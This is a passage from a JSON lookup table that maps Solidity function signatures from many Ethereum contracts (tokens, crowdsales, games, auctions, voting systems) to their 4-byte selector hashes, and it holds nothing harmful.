"0x7e02bb0f", "getTokenIssued(address)": "0xf8e4500a", "calculateWeiForStage(int256)": "0x68240412", "setCrowdsaleStage(uint256)": "0xa997f82f", "SilcCrowdsale(uint256,uint256,uint256,address,uint256,uint256)": "0xe685f2fe", "unpauseRefund()": "0x1a809b02", "pauseRefund()": "0x6d7fd8a3", "claimRefundOnUnsuccessfulEvent()": "0x358507d7", "MyRefundableCrowdsale(uint256)": "0x82286755", "myRefund(address)": "0x02db2d8a", "isRefundPaused()": "0x8a80d9a3", "refundWhenNotClosed(address)": "0xdb7bc073", "MyRefundVault(address)": "0xc03785c3", "FLC(uint256,string,string)": "0x99767aa9", "CorelliCoin(uint256,string,string)": "0x5578b51e", "address(address,uint256)": "0x739d980e", "addressAt(bytes,uint256)": "0xe9a6fdc3", "addressOf(uint256)": "0x11a800bc", "addressGains(address)": "0xc6e416b5", "addressPositions(address,uint256)": "0x123731c4", "addressOf(bytes)": "0x3cb94596", "uint32At(bytes,uint256)": "0xba5cb281", "mintToken(address,uint256)": "0x79c65068", "PutGift(address)": "0x108d40f8", "startGame(uint32,bytes32)": "0x134ff97e", "transferGift(address,address)": "0xd1bc2cc4", "POOL_FEE()": "0xdd1b9c4a", "LOCK_START()": "0xc7e35a5c", "addCountries()": "0xc6354bc0", "LOCK_END()": "0xabe7cc7b", "BUY_INCREASE()": "0x8440b3b0", "awardCup(uint8)": "0x7c3ffdee", "buyCup()": "0x67b16407", "getCountryById(uint8)": "0x50b04a4e", "countries(uint8)": "0x4a2a4ebc", "DEV_FEE()": "0x436a88c1", "TOURNAMENT_ENDS()": "0x3f651bab", "cup()": "0x3ad10beb", "buy(uint8)": "0x14107f3c", "getBalanceByAddress(address)": "0x136d6a39", "SetPwd(bytes32)": "0xdf9933e5", "Put(bytes32,uint256)": "0x166eb4cb", "_computeNextGen0Price(uint256)": "0xfe353d28", "calculateDividends(uint256)": "0x2cf86006", "cbAddress()": "0xc281d19e", "mint(int256,uint256,bytes32)": "0xeb381429", "_transfer(address,address,uint256,uint256)": "0x1d6456c4", "change(address,address,uint256,uint256)": "0x5e5144eb", "quickConvertPrioritized(address[],uint256,uint256,uint256,uint256,uint8,bytes32,bytes32)": "0x14c9035e", "authorizedCaller()": "0x97dc97cb", "destination()": "0xb269681d", "halted()": "0xb9b8af0b", "redeemToken(uint256,address)": "0xc3501ff6", "forward(address,uint256,bytes,bool)": "0xe04f31e9", "modifyEligibility(uint256)": "0xfa55f4d4", "confirmBobDirectPay(uint256)": "0xed06a62c", "numberOfExchInEstateNasAlice(address,uint256)": "0xe00f882c", "confirmAlice(uint256)": "0xde14d323", "confirmBobIndirectPay(uint256)": "0xc9791e0d", "numberOfExchInEstateNasBob(address,uint256)": "0xc119167b", "initBob(uint256,uint256)": "0xbd242709", "getAlice(uint256)": "0xb31cbe9a", "preCaution()": "0xa5c5436f", "getBob(uint256)": "0x9f977b21", "getAmount(uint256)": "0x9980ec86", "cancelOfferBob(uint256)": "0x96f6706f", "cancelOfferAlice(uint256)": "0x94066fb1", "trialDeadline()": "0x91bbb21a", "getUnixTimeStamp()": "0x7e0f7a87", "getEstate(uint256)": "0x786420d1", "CanISuscribeTrial(uint256)": "0x71cf586f", "renounceOwnership()": "0x715018a6", "newUser()": "0x6cebad98", "getJuryMembers(uint256)": "0x6b655e45", "whatsMyJuryNumber(uint256,address)": "0x592341df", "jurySize()": "0x536c8c15", "demandTrial(uint256)": "0x4f840761", "eligibilityRate()": "0x3eaa7643", "initExAlice(address,uint256)": "0x3acd8b80", "users(uint256)": "0x365b98b2", "suscribeTrial(uint256)": "0x2d9fab98", "replyAlice(uint256)": "0x2ca5e3f5", "exchanges(uint256)": "0x2839fc29", "modifyTrialDeadline(uint256)": "0x17490da8", "totalExch()": "0x0fea657f", "getExchange(uint256)": "0x0b9d5847", "modifyJurySize(uint256)": "0x0ab2a9b8", "getNumberOfCreatedTokens()": "0x7b707e9c", "createCommunityToken(string,uint8,string,uint8)": "0xeb28615e", "createdTokens(uint256)": "0xd782d647", "isCommunityToken(address)": "0x93768820", "gluon()": "0x27869c57", "getMyClones()": "0xfacf55e6", "becomeNorsefire()": "0xf23ca012", "releaseTheOriginal(uint256)": "0xe9639c80", "calculateIdeaBuySimple(uint256)": "0xe3e10762", "clones_to_create_one_idea()": "0xe1bc048e", "marketIdeas()": "0xdee86dfb", "norsefirePrice()": "0xdce5c5a9", "getIdeasSinceLastDeploy(address)": "0xdc46a76d", "getNorsefirePrice()": "0xc27d1580", "boostCloneMarket(uint256)": "0xc123a658", "hijackClones()": "0xb3c10469", "currentNorsefire()": "0xb1084ce2", "starting_clones()": "0xa2fb98fa", "referrals(address)": "0x9ca423b3", "lastDeploy(address)": "0x9b7c288f", "sellIdeas()": "0x9655e4b0", "calculateIdeaSell(uint256)": "0x72909e28", "claimedIdeas(address)": "0x674a1574", "deployIdeas(address)": "0x56f2fc89", "devFee(uint256)": "0x3bc0461a", "buyIdeas()": "0x29730ea4", "calculateTrade(uint256,uint256,uint256)": "0x229824c4", "arrayOfClones(address)": "0x1fa45291", "blockIndex(uint64,uint64)": "0xb126dc4d", "blockCount(uint64)": "0x4371e46e", "lastBlock(uint64)": "0xc5db22da", "channelCloseTimestamp(uint64)": "0x209cccd7", "channelOpened(uint64)": "0xe0a8aa72", "channelCloseTimeout(uint64)": "0xfb34d075", "channelResultTimeout(uint64)": "0x141fd3cf", "channelPartTimeout(uint64)": "0x757a5522", "channelDisputeResolver(uint64)": "0x05ce55fc", "testGoalReached()": "0xa40e0b91", "makeLiquid()": "0xe1419546", "createIlliquidToken(address,uint256)": "0x215cb8df", "GUPToken(address,uint256)": "0x69fd75b1", "destructAll()": "0xca88b3b2", "destructOne(bytes32)": "0x6dafc6b7", "setOneContract(uint256)": "0x6820f8d2", "setAllContracts()": "0xd2571062", "deregister(bytes32)": "0x20813154", "registerContract(address,bytes32,bool)": "0x9576e5b3", "setContract(address,bytes32,bool)": "0x299af64b", "FlightDelayController()": "0xc0a8fb73", "chairBalance()": "0x4f5d5295", "addProposal(string,string)": "0x23d1c95e", "closeAuction(uint256)": "0x236ed8f3", "setDesignatedReporterShowed(bool)": "0x310815ee", "setDesignatedReporterWasCorrect(bool)": "0x1befd26a", "finishedCrowdsourcingDisputeBond()": "0x03bcf514", "disavowTokens()": "0x3950f3a2", "migrateDueToNoReports()": "0xd1fe43ba", "firstReporterCompensationCheck(address)": "0x4c6adb31", "getDesignatedReportDisputeDueTimestamp()": "0x2531a36a", "getDesignatedReportReceivedTime()": "0x91fa196d", "getDesignatedReportDueTimestamp()": "0xee790db2", "getBestGuessSecondPlaceTentativeWinningPayoutDistributionHash()": "0xb4e19f3e", "getDesignatedReportPayoutHash()": "0xecf9d3e9", "designatedReport()": "0x440d2437", "getUpdateDerivePayoutDistributionHashValue()": "0x994f2e10", "getInitializeDesignatedReporterAddressValue()": "0x2a812941", "getInitializeCreatorValue()": "0x6d53393b", "getInitializeCashValue()": "0xf70fa221", "getInitializeFeePerEthInAttoethValue()": "0xbb053484", "getInitializeNumTicksValue()": "0xeb53a9a3", "getInitializeNumOutcomesValue()": "0x6ecb97cd", "getInitializeEndTime()": "0x4a4f76d5", "setTransferOwnership(bool)": "0x7665f6a7", "setIsInvalid(bool)": "0x53f9ec67", "setMigrateDueToNoReports(bool)": "0x3d9af4d1", "setFirstReporterCompensationCheck(uint256)": "0x4b82f437", "setDesignatedReportDisputeDueTimestamp(uint256)": "0x69e01731", "setDesignatedReportReceivedTime(uint256)": "0xddf2d8cd", "setDesignatedReportDueTimestamp(uint256)": "0x1c931313", "setBestGuessSecondPlaceTentativeWinningPayoutDistributionHash(bytes32)": "0x19d4c380", "setTentativeWinningPayoutDistributionHash(bytes32)": "0xfb74da7e", "setDesignatedReportPayoutHash(bytes32)": "0x4f04a36e", "setFinalPayoutDistributionHash(bytes32)": "0xfdad711d", "setFinalizationTime(uint256)": "0xe3ac8e16", "setMarketCreatorSettlementFeeDivisor(uint256)": "0xee69590f", "setDesignatedReporter(address)": "0xf2455807", "setNumTicks(uint256)": "0x5dc11a89", "setNumberOfOutcomes(uint256)": "0x3e62d835", "setDerivePayoutDistributionHash(bytes32)": "0x6f0503ad", "setDesignatedReport(bool)": "0xc794549e", "updateRecordWalletAddress(string,address)": "0x8f88110d", "getWalletAddress(string)": "0x08f20630", "addRecord(string,address,string,address)": "0x3acce2b2", "hasRequested(bytes32,address[])": "0x95fdd612", "getRequesters(bytes32,uint256)": "0x9e931e6b", "getRequest(bytes32)": "0xfb1e61ca", "transferAndExecute(address,uint256,string,string)": "0xf8193547", "localsCointoken(uint256,string,uint8,uint256,string,string)": "0x4b760612", "spendWithGasAndData(address,uint256,uint256,bytes)": "0xc217a724", "spendWithGas(address,uint256,uint256)": "0x2cae9ca1", "DTRExpensiveWallet(uint256)": "0xdb4ce763", "test_increaseTimeBy800000_timecheck()": "0xe52c17a8", "test_expiry_increaseTimeBy30000()": "0x05976587", "test_someOtherTest()": "0x70a8609e", "getNumber(uint256)": "0xfc563658", "migrateBalance(address)": "0x2988e36b", "migrateBalances(address[])": "0x4b92738e", "LegacyRepToken(address,uint256,address)": "0x681478ab", "SuddenDecayingTokenFunction()": "0x12709b90", "KPCSAdministrator()": "0x7d897ccd", "ParticipantAgent()": "0x9caab55a", "ParticipantAuthority()": "0xc9c4797d", "Participant()": "0x93e1021a", "Party()": "0x361a4eb8", "ROSCA(uint16,uint128,uint256,address[],uint16)": "0xcf957ce0", "_emitJobCanceled(uint256)": "0x5aa00cc4", "_emitPaymentReleased(uint256)": "0x45c41132", "_emitWorkFinished(uint256,uint256)": "0xcc7b60fe", "_emitTimeAdded(uint256,uint256)": "0xdccb5afb", "_emitWorkResumed(uint256,uint256)": "0x0b586f1a", "_emitWorkPaused(uint256,uint256)": "0x7076738b", "_emitWorkStarted(uint256,uint256)": "0xdbdf8538", "_emitJobOfferAccepted(uint256,address)": "0x916f5de1", "_emitJobOfferPosted(uint256,address,uint256,uint256,uint256)": "0xf9c58926", "_emitJobPosted(uint256,address,uint256,uint256,uint256,bytes32,bool)": "0x9fa95bfe", "emitJobCanceled(uint256)": "0x9c6e1d46", "emitPaymentReleased(uint256)": "0xd6495676", "emitWorkFinished(uint256,uint256)": "0xef29a7e5", "setratePreSale(uint256)": "0x6de74bbe", "MahalaCoin()": "0x411d3021", "setFrozenAccountICO(bool)": "0xf6df0d50", "LADToken()": "0x7c366cb5", "pauseable()": "0x03b98c0e", "BTImint(address,uint256)": "0x0a12c89e", "Bhinnekamint(address,uint256,uint256)": "0x1644b20b", "tokensup(uint256)": "0x247aebbb", "Bhinneka(address)": "0x0935fced", "transferOwnerShipToPendingOwner()": "0xefbc0075", "transferCrowdSale(bool)": "0x3292b71f", "finalizeIco()": "0x903a3ef6", "createIco(uint256,uint256,uint256,uint256,uint256,address)": "0x53c194af", "createPreIco(uint256,uint256,uint256,uint256,uint256,uint256,address)": "0x960a48ae", "mintAndCreatePreIcoBitex(address,address)": "0x675518b8", "prepare(uint256,address,address)": "0xcc8b96e5", "InitIcoController(address)": "0xad7b09c5", "transferVault(address)": "0xd2dd9f79", "changeDates(uint256,uint256)": "0x2efb77c4", "changeMinimumAmount(uint256)": "0x77eab3e3", "minted()": "0x4f02c420", "computeTokenWithBonus(uint256)": "0xf7f32916", "getClearance(address,address)": "0x5ba8eb42", "getContributor(address,address)": "0x9e288374", "setContributor(address,address,bool,uint16,uint16,address)": "0x89a0b679", "modifyTransferableHash(address,bool)": "0x2c9c0fb5", "adminResetLottery()": "0x535b4e58", "payDev(address)": "0x1776683e", "payWinner(address)": "0x19b09f9b", "returnAnyERC20Token(address,address,uint256)": "0x9fc9278e", "openToThePublic()": "0x246d4098", "myDividends()": "0x3151ecfc", "create(bytes)": "0xcf5ba53f", "createICO(bytes,bytes)": "0x0bc69912", "transferRole(string,address)": "0x4cfe62c7", "OwnableImpl()": "0x91ec910e", "checkOwner()": "0xcdbce03d", "updateICOPrice()": "0xce017242", "setICOPriceatDollar(uint256)": "0xa8e91396", "stopThisIco(bool)": "0x0a2d967b", "destroyToken(uint256)": "0x8a7d124b", "mintToken(uint256)": "0xc634d032", "changeBank(uint256)": "0xe1dbc281", "commRate(uint256)": "0x901c7518", "setICOPrice(uint256)": "0x25b5160c", "setPreICOPrice(uint256)": "0x8408cb9d", "updatePrices()": "0x49dd1262", "checkPreIcoStatus()": "0xdf817e54", "checkMinimalGoal()": "0x3fcd06fa", "checkFrozenAccounts(address)": "0xc5c01169", "calculateTheEndPrice(uint256)": "0x58e46275", "METADOLLAR()": "0xe73c99a0", "Barbie()": "0xb32f4b9a", "setAdministrator(address,bool)": "0x87c95058", "Tronerium()": "0x57a9838a", "setExchangeStart(bool)": "0xb16b8485", "ownerKill(address)": "0x990460c1", "freezeAccount(address,bool,bool)": "0xf7a268c4", "setContractStart(bool)": "0xb8973927", "setFundOnContract(bool)": "0xf48513ed", "GEMCHAIN()": "0xa5a32c3a", "BesideERC20(uint256,string,string)": "0xdf1ec3ea", "distributeToken(address[],uint256)": "0xa9c7648f", "LotteryToken()": "0x109c2032", "setTokenTransferStatus(bool)": "0x77542194", "setIcoPaymentStatus(bool)": "0xcbe239ed", "setWhitelistAddress(address,bool)": "0x3f914aef", "FinishIco()": "0xd180ebca", "setIcoTier(uint256)": "0x342b88ba", "icoReturnBonus(uint256)": "0xaade9bb4", "sendUnsoldTokenToRewardSupply()": "0x162897c0", "unlockGrowthPoolTokenSupply()": "0x4ba034dc", "unlockDevTokenSupply()": "0xd0b0c0d5", "TRONCLASSIC()": "0x868149da", "deployGLX()": "0x81207183", "VIETNAMTOKENTEST()": "0x58d9f95d", "setRoundParams(uint8,uint256,uint256,uint256,uint256,uint256)": "0x07dc6bd1", "_getCurrentRound(uint256)": "0x5ac1caa0", "triggerICOState(bool)": "0x8c9e81e5", "soldPerCurrentRound()": "0x5e1eabd2", "_getTokenAmount(uint256,uint256)": "0x1719b727", "mintForInvestor(address,uint256)": "0xf7ecc428", "_buyTokens(address,uint256)": "0x781db835", "BITToken()": "0x7c08ab5b", "generateNewRandom()": "0x7c6eb7bb", "setPurchasing(bool)": "0xce806176", "DrunkCoin()": "0x3eb96aed", "getNowFromOwner()": "0xcd59bf5b", "setNow(uint256)": "0xe380ae96", "TokenMock(string,address)": "0xa1b64c86", "LuHuToken(string,address)": "0xb0355b45", "isInWhitelist(address)": "0x09fd8212", "unWhitelist(address)": "0xf21af007", "setEndDate(uint256)": "0x3784f000", "mintSeq(address[])": "0x74f0765a", "setAmount(uint256)": "0x271f88b4", "setCanTransfer(bool)": "0x75ae267d", "division(uint256,uint256)": "0xe0068052", "verifyNonces(bytes,uint64[],uint64[])": "0x86842bc2", "payFromCampaign(bytes32,address,address)": "0x79853c7e", "multifunctioncoin()": "0x71ddd3ad", "WW3Token()": "0xf4d87f8a", "claim(string,string,string,bytes32,bytes)": "0x58d1aebd", "setPropheth(address)": "0x50558dd5", "stopAirdrop(bool)": "0x5670d6f1", "prophetize(string,string,string,bytes32,bytes)": "0x03980ac4", "USACOIN()": "0xa3bbf81b", "returnTokens(address,uint256)": "0x26fc4c7f", "tokenDrian()": "0xe420dcc5", "claimTokensForUser(address)": "0x0fa85ab0", "adminClaimTokenForUser(address)": "0x8ba7bdc4", "addManualContributor(address,uint256)": "0x255074a9", "eraseContribution(address)": "0x2211c3b3", "calculateNoOfTokensToSend(uint256)": "0xecee4eb1", "isWhiteListedAndAffiliate(address)": "0xa7977ffc", "batchTransfer(bytes32[],uint64)": "0x046672cc", "transferFromGate()": "0x58f24f3d", "openGate()": "0x82dc7836", "getGateAddress(address)": "0xd3d3d412", "transferToProxy(uint256)": "0xfcbd2731", "getEggsOff(address)": "0xec2c8fec", "BuyGold()": "0x400ff9a4", "BuyDoubler()": "0xa82cb091", "setCurs(uint256)": "0x59a80f0f", "HUNT(uint256,uint256,uint256,uint256,address)": "0xb8873077", "KomicaToken()": "0x0bae461c", "claimTokensFromTokenDistrict0xNetworkToken(address)": "0x383e9a3a", "enableDistrict0xNetworkTokenTransfers()": "0xb560b6da", "setDistrict0xNetworkToken(address)": "0xdd8bf1f5", "setMaxGasPrice(uint256)": "0xd2fa635e", "District0xContribution(address,address,address,address,address[])": "0x608f102e", "District0xNetworkToken(address,address)": "0x263fbef2", "changeGrantsController(address)": "0xdfce5a7a", "GrantsControlled()": "0xedeb34f7", "Polaris()": "0xc00ea6ef", "BabyBearToken()": "0x994828a1", "AdrenalinCoin(uint256,string,string)": "0xeed92ad5", "Hongshanchain(uint256,string,string)": "0xab6bfe78", "getDatas()": "0x6d34a775", "getrandoms()": "0x6585c27c", "setoraclelimitgas(uint256)": "0x9c9b1170", "setoraclegasprice(uint256)": "0x3bdf157a", "setminprice(uint256)": "0x300e4b3c", "setmaxprice(uint256)": "0xac151959", "setGameVars(uint256,uint256,uint256,uint256,uint256)": "0xff01ff08", "setGameOnoff(uint256)": "0x749ca1f3", "updatebalance()": "0xf8aa0a59", "senttest()": "0xfca2d9f5", "getallresutl()": "0x7aaf87d2", "getbetresultfirst(address)": "0xa232155d", "getbetresult(bytes32)": "0xd4c6d9ad", "openegg(uint256,uint256)": "0xd49d1836", "Eggfrenzy()": "0x1972c8dc", "getBalanceOfContractInSzabo()": "0xe30ca7cb", "revertAuction(uint256)": "0x5c5e20b6", "auctionEnd(uint256)": "0x32246e9f", "getBidFee(uint256)": "0xd53f1cbd", "setMaxDuration(uint256)": "0xcf0f34c4", "setStartAuctionFee(uint256)": "0x599651f3", "setEveryBidFee(uint256)": "0xeb3cd55c", "setBidFeePercents(uint256)": "0x74040cd2", "setMinBidDifferenceInSzabo(uint256)": "0xe51dc14a", "getRemainingTimeOf(uint256)": "0x4f3df0a8", "gallerySeven()": "0x5bd674dd", "gallerySix()": "0xd71801d4", "galleryFive()": "0xbc18f727", "galleryFour()": "0xe91208ad", "galleryThree()": "0xf2fd2a49", "galleryTwo()": "0xe0a8299f", "galleryOne()": "0x37806f07", "functionEight()": "0x33e712fe", "functionSeven()": "0x1ac47963", "functionSix()": "0x34484b47", "functionFive()": "0x27374015", "functionFour()": "0xf9355dca", "functionThree()": "0xb210e434", "functionTwo()": "0x6eef2cb7", "functionOne()": "0x181b3bb3", "setGallerySevenPrice(uint256)": "0x6c79e379", "setGallerySixPrice(uint256)": "0x3fa6010f", "setGalleryFivePrice(uint256)": "0xaa8596ea", "setGalleryFourPrice(uint256)": "0x748949e8", "setGalleryThreePrice(uint256)": "0xb71653a8", "setGalleryTwoPrice(uint256)": "0xfe08e5fe", "setGalleryOnePrice(uint256)": "0x087ca568", "setFunctionEightPrice(uint256)": "0xfc17d2ac", "setFunctionSevenPrice(uint256)": "0x1116f631", "setFunctionSixPrice(uint256)": "0x5a78897b", "setFunctionFivePrice(uint256)": "0x16cff511", "setFunctionFourPrice(uint256)": "0x0bac2850", "setFunctionThreePrice(uint256)": "0x99678b43", "setFunctionTwoPrice(uint256)": "0x6c3c221b", "setFunctionOnePrice(uint256)": "0x248c4439", "_getPrice(uint256)": "0x164116f8", "getTakeOwnershipFee(uint256)": "0xc907d53b", "cancelApproveForAddress(uint256)": "0xceff6fe6", "cancelApproveForAll(uint256)": "0xd175958f", "approveForAll(uint256)": "0x29db191f", "setPriceOfAss(uint256,uint256)": "0x50f1179a", "setCancelApproveFee(uint256)": "0x81f1aad7", "transferAllArgsYesAllowance(address,address,uint256,address)": "0x97a97005", "setAllowanceSheet(address)": "0xedc1e4f9", "transferAllArgsNoAllowance(address,address,uint256)": "0xdee023e2", "setBalanceSheet(address)": "0x54f78dad", "subAllowance(address,address,uint256)": "0x97d88cd2", "addAllowance(address,address,uint256)": "0x5fd72d16", "delegateDecreaseApproval(address,uint256,address)": "0x93d3173a", "delegateIncreaseApproval(address,uint256,address)": "0x554249b3", "delegateApprove(address,uint256,address)": "0x296f4000", "delegateTransferFrom(address,address,uint256,address)": "0x4df6b45d", "delegateAllowance(address,address)": "0x09ab8bba", "delegateTransfer(address,uint256,address)": "0x9cd1a121", "delegateBalanceOf(address)": "0x43a468c8", "delegateTotalSupply()": "0x76e71dd8", "BogdanoffCoin()": "0x60fe136e", "Ubiq()": "0x919e1967", "HPAToken(uint256,string,uint8,string)": "0xfee99e93", "AGCoin(uint256,string,string)": "0xeeb58410", "TokenAGC(uint256,string,string)": "0x6fc651f3", "WealthInternet(uint256)": "0x67dcec06", "createToken(uint256,address,string,string)": "0xd7131e5f", "_newWallet(address)": "0x16cc9022", "CrowdToken()": "0x2a37d540", "batchSend(uint256,address[])": "0x042cb150", "TimeLeft()": "0xde824f93", "getAmountSoldAfterPowerDay()": "0x2af0ac71", "dividendRewards(address,address)": "0x075c04ab", "claimINRDividends()": "0xfad992ea", "Tier_Rainmaker_Registration()": "0x5946e7eb", "Tier_Wildcat_Registration()": "0x4c3f8ec0", "Tier_Classic_Registration()": "0x73898796", "Tier_Basic_Registration()": "0x9ab3bfd7", "Tier_Starter_Registration()": "0x7c44f160", "HODLRegistration()": "0xdda9f1a3", "dividendRegistration()": "0x34aa0e7f", "servicePayment(uint256)": "0x491abe0c", "updateCost(uint256)": "0x23c5a088", "PaymentStatusTimeStamp(address,address)": "0xc0910475", "PaymentStatusBlockNum(address,address)": "0x47d42c73", "assignInitialAddresses(address[],address)": "0x68458fcf", "blockDiff()": "0x48b9f88f", "iGniter()": "0x3a559de6", "TokenCoinExchanger()": "0xfdd8a733", "TFcoin(uint256,string,string)": "0xbe08d744", "MultisigWalletZeppelin(address[],uint256,uint256)": "0x70f0dfee", "kkTestICO1()": "0x91d781ba", "kkTestCoin1()": "0x48beae6a", "GeXCHANGE()": "0x7d820414", "setTokenSupplyLimit(uint256)": "0xfbd7b853", "ARIToken(address,address)": "0x9e9e5b85", "CRYPTOZOLToken()": "0x47767c5d", "Shard()": "0xfd9e8ff7", "setChibiGEN0Price(uint256)": "0x1e7de8cc", "buyGEN0Chibi(string,string,uint8,uint256)": "0x917fd839", "_mint(string,string,uint8,uint256,bool,uint256)": "0x5910ce39", "mintSpecial(string,string,uint8,uint256,uint256)": "0x954cbe3f", "fusionChibis(uint256,uint256,uint256,string,string,uint8)": "0x3a38b90f", "exhaustChibis(uint256,uint256)": "0x031122ef", "exhaustFusion(uint256)": "0x57393674", "exhaustBattle(uint256)": "0x826c10d9", "queryChibiAdd(uint256)": "0xcbf9a125", "queryChibi(uint256)": "0x8a3f8a23", "queryFusionData_ext(uint256)": "0xdac3f6d2", "queryFusionData(uint256)": "0x5d01615f", "setGeneContractAddress(address,address)": "0x7f18f10c", "cancelChibiForFusion(uint256)": "0x7f486ca6", "setChibiForFusion(uint256,uint256)": "0x14131611", "buyChibiWithFcf(string,string,uint8,uint256)": "0x8b73c10e", "isNecromancer(uint256)": "0x7774c394", "renameChibi(uint256,string)": "0x363fa6b2", "setBattleRemoveContractAddress(address,address)": "0x95210e59", "setBattleContractAddress(address,address)": "0x25618ca8", "setFcfContractAddress(address,address)": "0x8ffbd95b", "changeInfoUrl(uint256,string)": "0xc3af38fa", "setInfoUrlPrefix(string)": "0xf1d91942", "getGameState()": "0xb7d0628b", "setGameStateFusion(bool)": "0x5468e4e1", "setGameStateFCF(bool)": "0x11196117", "setGameState(bool)": "0x38cc17ee", "setExhaustionTime(uint256)": "0x6daa9f56", "setAdultTime(uint256)": "0x06090738", "setMinimumPriceFusion(uint256)": "0xab021884", "setComission(uint256)": "0x0be80f39", "exhaustAfterBattle(uint256,uint256)": "0x927f4be0", "exhaustAfterFusion(uint256,uint256,uint256)": "0xd3f8cc95", "applyPresale()": "0xe97e6dca", "initCrowdsale(uint256,uint256,uint256,address,address)": "0x021da58e", "nextRate(uint256)": "0x889eaa0d", "forwardRemaining()": "0x3797b4de", "SynTokenCrowdsale()": "0xbde7ef86", "buyForBitcoin(address,uint256)": "0xb63c57f1", "MDKICO(uint256,uint256,uint256,address,address)": "0xba66d7a6", "startPreICO(address)": "0xc3218f50", "startICO(address)": "0xc7a9d6de", "lockReserveTokens(address)": "0x270537c0", "lockTeamTokens(address)": "0x9719f290", "MDKToken(address)": "0x2b86d48a", "STRI()": "0xd2a2feaa", "BitcoinFast()": "0x39179ef9", "startRefund()": "0xadf4a144", "approveShutdown(uint256)": "0x4c6d350b", "proposeShutdown(uint256)": "0x858110a5", "triggerVersion(address)": "0x26086c70", "approveVersion(address)": "0xcb6308f1", "proposeVersion(address)": "0xa061eba0", "Governance(address[],uint256,uint256)": "0x8e90ccbe", "isMinimalReached()": "0x0e9f9f86", "isCapReached()": "0xd7e25c36", "giveReward(address,uint256)": "0xce8ae9f3", "addPriceChange(uint256,uint256)": "0xa01c144e", "getVestingAllocation(address,uint256)": "0xbf2805e3", "getVestingAccount(address)": "0x540a9db3", "releaseVestingAllocation()": "0x00ad8b69", "addVestingAllocation(address,uint256)": "0x5aad0450", "addVestingAccount(address,uint256,uint256)": "0xbb4d4b2f", "setForecasting(address)": "0x3041ba2a", "setLimitations(uint256,uint256,uint256)": "0x802d1848", "BasicCrowdsale(address,address,address,string,string,address,uint256,uint256)": "0x4407a75d", "endFunding(uint256)": "0x62a4cd14", "RGXBonus(string,string,uint256,uint8)": "0x2dae35c4", "getProposalUint(int256,uint256)": "0x33ea80cb", "getProposalAddress(uint256)": "0x1128bbfd", "getProposalAction(uint256)": "0x7da81364", "isVoterLocked(address)": "0x24888b4a", "pass(uint256)": "0xd67c9961", "unvote(address,uint256)": "0x02aa9be2", "submitProposal(bytes32,string,address,address,uint256)": "0xbcd789cc", "Congress(address)": "0x34f6d0b3", "REALCrowdsaleMock()": "0x7e347b82", "detachController()": "0x57d444fd", "MultiownedControlled(address[],uint256,address)": "0xf625f472", "unchanged(address)": "0x68dc3926", "change(address,uint256[])": "0xdc35213f", "issue(uint256,address)": "0xb696a6ad", "genuine(address)": "0x392db91e", "print(int256,uint256)": "0x3f9c7822", "logging(uint256)": "0xe870bec1", "returned()": "0x6cb76408", "change(uint256[])": "0xf8868778", "Banknote(address,uint256)": "0xc4477a11", "unmint(int256,uint256)": "0x18b64d5b", "Filter(address[],uint256[])": "0x07c8e56f", "dataOf(uint256)": "0x871caa98", "numDataOf(uint256)": "0x9dc11280", "metadataOf(uint256)": "0x0ef7cc8e", "hasExecuted(uint256)": "0xe074b027", "votePositionOf(uint256,uint256)": "0xcd496e35", "voteWeightOf(uint256,uint256)": "0x4445b569", "weightOf(uint256,uint256)": "0x199ed01b", "momentNonceOf(uint256,uint256)": "0xc713a67b", "momentBlockOf(uint256,uint256)": "0xa61e9f4d", "momentTimeOf(uint256,uint256)": "0xf1b3fd80", "momentValueOf(uint256,uint256)": "0x99f5c904", "momentSenderOf(uint256,uint256)": "0x088061bd", "numMomentsOf(uint256)": "0xc271ca90", "latestMomentOf(uint256,address)": "0x5f222da1", "claimGrant(uint256)": "0x6a0a1f8e", "addSolution(uint256,string,string,string,string,string)": "0x49517b41", "addProblem(string,string,string,string,string)": "0x044b1b02", "getSolution(uint256,uint256)": "0x9aacb18c", "getProblem(uint256)": "0x010d2446", "Villj()": "0x6aebc603", "completeOwnershipTransfer()": "0xe71a7811", "initiateOwnershipTransfer(address)": "0xc0b6f561", "loadMesa(bytes32,bytes32[],uint8[])": "0x440f807e", "loadMesaVerify(bytes32,bytes32[],uint8[])": "0x5df73398", "checkFiscal(bytes32)": "0xd5f5df2a", "checkFiscalVerify(bytes32)": "0xdbe2c85b", "check(bytes32,uint256,uint256,uint256)": "0x13d53ca9", "checkVerify(bytes32,uint256,uint256,uint256)": "0xf3cbc040", "setVicepresidenteDeMesa(bytes32)": "0xf64402c4", "setPresidenteDeMesa(bytes32)": "0x233104d6", "setPresidenteDeMesaVerify(bytes32)": "0x6a4b1b10", "setFiscal(bytes32)": "0xf4116381", "setFiscalVerify(bytes32)": "0x867b36fe", "isPresidenteDeMesa(bytes32)": "0xf018f741", "isFiscal(bytes32)": "0xb20953f2", "isValidParticipant(bytes32)": "0x68ef8661", "loadVotesForParticipant(bytes32,bytes32,uint8)": "0x77ca4d11", "loadVotesForParticipantVerify(bytes32,bytes32,uint8)": "0xcd3a7531", "getCounting(bytes32)": "0x8ceda04d", "getParticipantList()": "0xed214fff", "getCandidatesList()": "0x4aba5f34", "Mesa(bytes32[],uint256,address)": "0x0457d76b", "contains(uint256[],uint256)": "0xb32b8e2c", "contains(address[],address)": "0x3da80d66", "findTopNValues(uint256[],uint256)": "0xe5b02447", "take(uint256,address[])": "0x73925694", "take(uint256,bytes32[])": "0xc6891018", "take(uint256,uint256[])": "0xf4dba182", "sortDescBy(uint256[],uint256[])": "0x5fdf5357", "sort(address[])": "0x128424a7", "sort(uint256[])": "0x9ec8b026", "diff(uint256[],uint256[])": "0x6e09a4ab", "union(address[],address[])": "0x78537808", "union(uint256[],uint256[])": "0x2063165d", "intersect(address[],address[])": "0x9ea98d55", "intersect(uint256[],uint256[])": "0x373a3af8", "getPage(address[],uint256,uint256,bool)": "0x622235e6", "getPage(uint256[],uint256,uint256,bool)": "0x548d91b1", "TegTokens(uint256,string,string)": "0x944af2ae", "crowdsaleStatus()": "0x875f0671", "KRW_Omnidollar()": "0x404f8dc8", "_calculateTokens(uint256)": "0xd036bce2", "_validCrowdsale()": "0x8e180733", "fcomToken()": "0xa0268aea", "redeem(string)": "0x1222c25a", "EOSERC20(uint256,string,string)": "0x679f699e", "AtomicSwap(address,uint256,bytes32,uint256)": "0xeb1ab91b", "SSBToken()": "0x62ed4f04", "MyTestToken()": "0x30756ab6", "PapaToken()": "0x33783b9e", "detailsOf(address)": "0x0adae972", "aboveMinimumPurchase()": "0x0a412ae4", "getBonusMultiplier(uint256)": "0x58fd6fe2", "withdrawDevFee()": "0xcb93f7ef", "getReservedAmount(address)": 